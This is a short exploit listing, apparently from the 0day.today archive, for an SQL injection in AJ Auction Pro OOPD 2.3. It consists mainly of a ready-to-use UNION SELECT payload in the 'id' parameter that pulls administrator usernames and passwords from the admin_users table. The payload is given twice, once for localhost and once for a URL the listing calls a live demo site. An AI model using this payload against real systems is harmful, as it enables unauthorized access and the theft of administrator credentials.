AJ Auction Pro OOPD 2.3 (id) SQL Injection Vulnerability

2009-01-20T00:00:00
ID 1337DAY-ID-4713
Type zdt
Reporter Snakespc
Modified 2009-01-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ========================================================
AJ Auction Pro OOPD 2.3 (id) SQL Injection Vulnerability
========================================================

                 ====================================================================================
                =                                                                                    =                                                                                   =
                =            http://www.ajsquare.com/products/auction/demo.php  "index.php"          =
                 ====================================================================================

Exploit:
http://localhost/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
********
demo:
http://www.ajauctionpro.com/oopd/index.php?do=search&id=-9+UNION SELECT concat(user_name,0x3a,password)+from+admin_users--
============================================================================================================================



#  0day.today [2018-01-04]  #